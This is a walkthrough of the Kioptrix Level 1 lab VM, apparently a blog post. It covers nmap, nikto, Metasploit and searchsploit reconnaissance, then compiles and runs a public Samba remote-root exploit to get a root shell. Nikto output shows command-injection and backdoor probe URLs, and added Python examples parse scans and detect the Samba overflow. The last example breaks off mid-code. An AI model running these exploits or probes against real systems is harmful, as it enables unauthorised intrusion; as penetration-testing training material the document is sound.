# Lab setup

I'm using VMware Workstation 17. Because the lab VM ships pre-packaged, simply copying it in does not get it an IP address; it has to be configured by hand first.

  1. Don't power it on right away. Open the VMX file in Notepad, delete every entry that starts with ethernet0 and save.
  2. Change the virtualHW.version entry to the correct version number, 17 in my case.
  3. Re-import the virtual machine, add a network adapter and set its mode to NAT.

That gets it onto the VM network.
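As an added example (not part of the original post), the Python below performs steps 1 and 2 on a VMX file: it drops every ethernet0.* entry, so VMware generates a fresh adapter and MAC when one is re-added, and pins virtualHW.version to the installed Workstation version. The SAMPLE_VMX text is constructed; the key names are the standard VMware ones.

```python
from pathlib import Path

# Constructed sample VMX fragment (not the real Kioptrix file): the NIC
# entries that have to go, plus an old virtual hardware version.
SAMPLE_VMX = """\
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "7"
displayName = "Kioptrix Level 1"
ethernet0.present = "TRUE"
ethernet0.connectionType = "bridged"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:25:fe:e8"
guestOS = "other26xlinux"
"""


def fix_vmx(text: str, hw_version: int) -> str:
    """Drop every ethernet0.* entry and pin virtualHW.version.

    Removing the NIC forces VMware to create a new adapter (and MAC) when one
    is added back in the GUI; the hardware version must match the installed
    Workstation release (17 in the write-up).
    """
    out = []
    seen_hw = False
    for line in text.splitlines():
        key = line.split("=", 1)[0].strip()
        if key.startswith("ethernet0."):
            continue
        if key == "virtualHW.version":
            line = f'virtualHW.version = "{hw_version}"'
            seen_hw = True
        out.append(line)
    if not seen_hw:                      # file had no version line at all
        out.append(f'virtualHW.version = "{hw_version}"')
    return "\n".join(out) + "\n"


def fix_vmx_file(path: Path, hw_version: int) -> Path:
    """Edit a .vmx in place, keeping a .bak copy so the original can be restored."""
    original = path.read_text(encoding="utf-8")
    path.with_name(path.name + ".bak").write_text(original, encoding="utf-8")
    path.write_text(fix_vmx(original, hw_version), encoding="utf-8")
    return path


if __name__ == "__main__":
    # Usage on a real file: fix_vmx_file(Path("Kioptrix_Level_1.vmx"), 17)
    print(fix_vmx(SAMPLE_VMX, 17))
```

Step 3 (re-import, add a NAT adapter) is still done in the Workstation GUI; the script only prepares the file so that import succeeds.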

IP: 192.168.74.133

# Information gathering

## nmap

```
C:\WINDOWS\system32>nmap -sV 192.168.74.133 -p- -O
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 10:58 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.00045s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: jMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:25:FE:E8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
```

SSH is open; brute forcing is an option.

Port 80 serves the Red Hat test page.

Samba is also running, but no concrete version number is shown.

Tried the usual Samba exploit module, usermap_script, without success.
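As an added example (not from the write-up), a small Python triage script that parses the port table from the nmap -sV output above and flags the legacy indicators a defender would act on: "protocol 1.99" on SSH means SSHv1 is still negotiable, Apache 1.3 and OpenSSL 0.9.x are long past end of life, and the Samba banner carries no version. The regex rules and their thresholds are assumptions chosen for this scan, not a vulnerability-database lookup.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# The port table from the -sV run above, embedded as constructed input so the
# example runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: jMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""

# port/proto  state  service  [version...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_port_table(text: str) -> List[Service]:
    """Extract one Service per port line; header and footer lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append(Service(int(m[1]), m[2], m[3], m[4], m[5].strip()))
    return services


# (regex over the VERSION column, finding text). Assumed rules for this scan.
CHECKS = [
    (r"protocol 1\.99", "SSH still negotiates protocol 1 (1.99 = v1 and v2 offered)"),
    (r"OpenSSH [0-3]\.", "OpenSSH major version 3 or older"),
    (r"Apache(?: httpd)?[ /]1\.3", "Apache 1.3 branch (end of life)"),
    (r"OpenSSL/0\.9\.", "OpenSSL 0.9.x (SSLv2/SSLv3 era, no longer patched)"),
    (r"^Samba smbd(?!\s*\d)", "Samba version not in banner; fingerprint it separately"),
]


def triage(services: List[Service]) -> List[Tuple[int, str]]:
    """Return (port, finding) pairs for every rule that matches a service banner."""
    findings = []
    for svc in services:
        for pattern, note in CHECKS:
            if re.search(pattern, svc.version):
                findings.append((svc.port, note))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_port_table(NMAP_OUTPUT)):
        print(f"{port:>5}  {note}")
```

Running it lists seven findings across ports 22, 80, 139 and 443, which is the same picture the author reaches by reading the banners, but in a form that can be diffed against the next scan.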

Run a vulnerability scan as well.

```
C:\WINDOWS\system32>nmap 192.168.74.133 --script=vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 11:09 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.0012s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
| http-enum:
|   /test.php: Test page
|   /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|   /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_  /usage/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-dh-params:
|   VULNERABLE:
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
1024/tcp open  kdm
MAC Address: 00:0C:29:25:FE:E8 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Nmap done: 1 IP address (1 host up) scanned in 331.29 seconds
```

CVE-2009-3103 shows up, but the OS is Linux rather than Windows, so there is no exploit module that applies.
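The four TLS findings above (POODLE, CCS injection, Logjam and the weak DH group) all follow from what the server offers: protocol versions, cipher suites and DH parameters. As an added example, not part of the original post, the Python checker below expresses those checks as rules and runs them over two configurations: SCANNED, built from what nmap reported for 192.168.74.133:443 (SSLv3 plus CBC suites, the 512-bit export group and the 1024-bit group; the TLSv1.0 entry is an assumption), and HARDENED, a current profile that produces no finding. CCS injection is an OpenSSL library bug rather than a configuration choice, so it is out of scope for a config checker; on this box the real fix for all four is upgrading mod_ssl/OpenSSL, since Apache 1.3 cannot speak TLS 1.2 at all.

```python
from dataclasses import dataclass, field
from typing import List, Set, Tuple


@dataclass
class TlsConfig:
    protocols: Set[str]                                   # versions the server will negotiate
    cipher_suites: List[str]                              # IANA suite names, as nmap prints them
    dh_group_bits: List[int] = field(default_factory=list)  # finite-field DH groups offered


LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
WEAK_CIPHER_MARKERS = ("EXPORT", "DES40", "_DES_", "3DES", "RC4", "NULL", "MD5")

# Reconstructed from the ssl-poodle / ssl-dh-params output above (constructed
# input; TLSv1.0 is assumed, the scan itself only proves SSLv3 is on).
SCANNED = TlsConfig(
    protocols={"SSLv3", "TLSv1.0"},
    cipher_suites=[
        "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
        "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
        "TLS_DHE_RSA_WITH_DES_CBC_SHA",
    ],
    dh_group_bits=[512, 1024],
)

# A current baseline: TLS 1.2/1.3 only, AEAD suites with ephemeral ECDH, no finite-field DH.
HARDENED = TlsConfig(
    protocols={"TLSv1.2", "TLSv1.3"},
    cipher_suites=["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "TLS_AES_256_GCM_SHA384"],
)


def evaluate(cfg: TlsConfig) -> List[Tuple[str, str]]:
    """Apply the checks behind the nmap ssl-* findings; return (id, detail) pairs."""
    findings = []
    legacy = sorted(cfg.protocols & LEGACY_PROTOCOLS)
    if legacy:
        findings.append(("LEGACY-PROTOCOL", "obsolete versions offered: " + ", ".join(legacy)))
    # POODLE needs SSLv3 and a CBC suite: SSLv3 does not check CBC padding bytes,
    # so a MitM can use the server as a padding oracle.
    cbc = [s for s in cfg.cipher_suites if "_CBC_" in s]
    if "SSLv3" in cfg.protocols and cbc:
        findings.append(("POODLE", "SSLv3 with CBC suites: " + ", ".join(cbc)))
    # Logjam: export DHE suites, or any 512-bit group, let a MitM downgrade the key exchange.
    export = [s for s in cfg.cipher_suites if "_EXPORT_" in s]
    small = [b for b in cfg.dh_group_bits if b <= 512]
    if export or small:
        findings.append(("LOGJAM", f"export DHE suites {export}, DH groups {small} bits"))
    # Under 2048 bits a commonly shared group is within reach of precomputation.
    medium = [b for b in cfg.dh_group_bits if 512 < b < 2048]
    if medium:
        findings.append(("WEAK-DH", f"DH groups under 2048 bits: {medium}"))
    weak = [s for s in cfg.cipher_suites if any(m in s for m in WEAK_CIPHER_MARKERS)]
    if weak:
        findings.append(("WEAK-CIPHER", "weak suites: " + ", ".join(weak)))
    return findings


if __name__ == "__main__":
    for name, cfg in (("scanned", SCANNED), ("hardened", HARDENED)):
        print(name, evaluate(cfg) or "no findings")
```

The same rules can be fed from a live probe (nmap's ssl-enum-ciphers output, or an openssl s_client loop over versions) instead of the hand-built SCANNED object; the point is that each nmap finding maps to one offered-parameter check that a deployment pipeline can fail on before the host goes live.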

## nikto

```
┌──(root㉿kali)-[~/Desktop]
└─# nikto -h 192.168.74.133
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.133
+ Target Hostname:    192.168.74.133
+ Target Port:        80
+ Start Time:         2024-04-05 23:23:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2024-04-05 23:23:46 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

There are some false positives: the items reporting backdoors and remote command execution were all checked, and there is nothing there.

The CVEs listed are a few XSS issues, which are of no value for this lab.

The manual directory has to be accessed locally via 127.0.0.1; I guess a header needs to be added to reach it.

As for these Apache vulnerabilities:

```
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
```

Eh, I'll just go and search searchsploit directly.

## metasploit

nmap did not reveal the exact Samba version, but Samba is a frequent source of vulnerabilities, so try again with Metasploit.

```
msf6 auxiliary(scanner/smb/smb_version) > set RHOST 192.168.74.133
RHOST => 192.168.74.133
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.74.133:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.74.133:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.74.133:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
```

The version is Samba 2.2.1a.

Searching for matching exploit modules turns up 6.

Checking the target versions of every module, only the last one supports 2.2.1a, so let's use it. It has to brute force the address, so wait and see.

Waited a bloody ten-odd minutes with no result; a few sessions appeared along the way, but they all died. Out of options here.

## searchsploit

Look up the vulnerabilities.

### samba

```
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit samba 2.2.1a
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Ove | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Ex | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (P | linux_x86/dos/36741.py
------------------------------------------- ---------------------------------
```
  • The first one was already tried in Metasploit (the Linux version) and no shell came back, which is puzzling; maybe the module no longer works with newer msf releases.
  • The second one can be attempted; testing shows it works.
  • The third depends on whether the OS is RedHat.
  • The fourth is a denial of service and of no value here.

### apache

```
# searchsploit apache 1.3.20
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution                                                                                                            | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner                                                                                                          | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure                                                                                                                   | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access                                                                                                            | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure                                                                                                                | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow                                                                                                                 | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow                                                                                                                 | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                                                                                           | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution                                                                                                                             | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service                                                                                                                        | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                       | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                 | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                 | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)                                                                          | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)                                                                                                              | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection                                                                                                                              | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing                                                                                                                          | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal                                                                                                                        | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)                                                                                                                  | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                                                               | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                                                               | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)                                                                                                               | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service                                                                          | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution                                                                                           | linux/remote/34.pl
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

Some of these may apply, for example linux/remote/132.c, which on inspection is for enumerating users.

But here I only need high-value modules that get a shell.

## dirsearch

With port 80 open, sensitive directories certainly have to be scanned.

```
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.133/
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.133\__24-04-06_11-08-35.txt

Target: http://192.168.74.133/

[11:08:35] Starting:
[11:08:40] 403 -  275B  - /.ht_wsr.txt
[11:08:40] 403 -  278B  - /.htaccess.bak1
[11:08:40] 403 -  278B  - /.htaccess.orig
[11:08:40] 403 -  278B  - /.htaccess.save
[11:08:40] 403 -  280B  - /.htaccess.sample
[11:08:40] 403 -  279B  - /.htaccess_extra
[11:08:40] 403 -  278B  - /.htaccess_orig
[11:08:40] 403 -  276B  - /.htaccess_sc
[11:08:40] 403 -  276B  - /.htaccessOLD
[11:08:40] 403 -  277B  - /.htaccessOLD2
[11:08:40] 403 -  276B  - /.htaccessBAK
[11:08:41] 403 -  268B  - /.htm
[11:08:41] 403 -  269B  - /.html
[11:08:41] 403 -  278B  - /.htpasswd_test
[11:08:41] 403 -  274B  - /.htpasswds
[11:08:41] 403 -  275B  - /.httr-oauth
[11:09:20] 403 -  272B  - /cgi-bin/
[11:09:32] 403 -  268B  - /doc/
[11:09:32] 403 -  283B  - /doc/en/changes.html
[11:09:32] 403 -  272B  - /doc/api/
[11:09:32] 403 -  282B  - /doc/stable.version
[11:09:32] 403 -  283B  - /doc/html/index.html
[11:10:00] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/
[11:10:05] 200 -   17KB - /mrtg/
[11:11:01] 200 -   27B  - /test.php
[11:11:07] 301 -  293B  - /usage  ->  http://127.0.0.1/usage/
[11:11:24] 403 -  273B  - /~operator
[11:11:24] 403 -  269B  - /~root
```

There are redirects to 127.0.0.1; let's change X-Forwarded-For and see what comes back.

The usage page still redirects, for reasons I don't know; if anyone knows, give me a nudge.

The manual page no longer redirects; opening it shows a mod_ssl folder, presumably a hint. Combined with the nikto results, we can be certain there is a related vulnerability.

# Exploitation

## Samba

searchsploit turned up an RCE that can be used.

Copy the exploit into the current directory and compile it with gcc:

```
searchsploit -m 10.c
gcc -o exp 10.c
```

Once it compiles, run it:

```
┌──(root㉿kali)-[~/Desktop]
└─# ./exp -b 0 192.168.74.133
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
```

Got root.
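From the defender's side, the overflow that 10.c uses against Samba < 2.2.8 belongs to the same trans2open family the OSX entry in the searchsploit list names, and it is visible on the wire as an SMB_COM_TRANSACTION2 request carrying the TRANS2_OPEN2 subcommand with an oversized parameter block. As an added example that is not the write-up's code, the Python below parses the NetBIOS session header and the SMB1 header and applies that heuristic; the 1024-byte threshold and the build_trans2 sample packets are constructed assumptions for the demonstration (a legitimate OPEN2 parameter block is a short fixed header plus a path, far below 1 KiB).

```python
import struct
from typing import Dict, Optional

SMB_COM_TRANSACTION2 = 0x32   # SMB1 command byte
TRANS2_OPEN2 = 0x0000         # Trans2 subcommand carried in Setup[0]
# Assumed detection threshold: anything above 1 KiB of OPEN2 parameters is
# treated as an attempt to overrun the fixed-size path buffer of Samba 2.2.
PARAM_LIMIT = 1024

# The 14 fixed parameter words of an SMB_COM_TRANSACTION2 request (MS-CIFS):
# TotalParameterCount, TotalDataCount, MaxParameterCount, MaxDataCount,
# MaxSetupCount, Reserved1, Flags, Timeout, Reserved2, ParameterCount,
# ParameterOffset, DataCount, DataOffset, SetupCount, Reserved3.
TRANS2_WORDS = "<HHHHBBHIHHHHHBB"
TRANS2_WORDS_LEN = struct.calcsize(TRANS2_WORDS)   # 28 bytes
NB_HEADER_LEN = 4
SMB_HEADER_LEN = 32


def parse_smb_request(pkt: bytes) -> Optional[Dict]:
    """Parse NetBIOS session + SMB1 headers; decode Trans2 fields when present."""
    if len(pkt) < NB_HEADER_LEN + SMB_HEADER_LEN + 1:
        return None
    if pkt[0] != 0x00 or pkt[4:8] != b"\xffSMB":     # session message + SMB1 magic
        return None
    command = pkt[8]
    info = {"command": command, "nb_len": int.from_bytes(pkt[1:4], "big")}
    if command != SMB_COM_TRANSACTION2:
        return info
    word_count = pkt[NB_HEADER_LEN + SMB_HEADER_LEN]
    words_off = NB_HEADER_LEN + SMB_HEADER_LEN + 1
    if word_count < 15 or len(pkt) < words_off + TRANS2_WORDS_LEN + 2:
        return info                                  # truncated: no setup word to inspect
    fields = struct.unpack_from(TRANS2_WORDS, pkt, words_off)
    info.update(total_param=fields[0], param_count=fields[9], setup_count=fields[13])
    if info["setup_count"] >= 1:
        info["subcommand"] = struct.unpack_from("<H", pkt, words_off + TRANS2_WORDS_LEN)[0]
    return info


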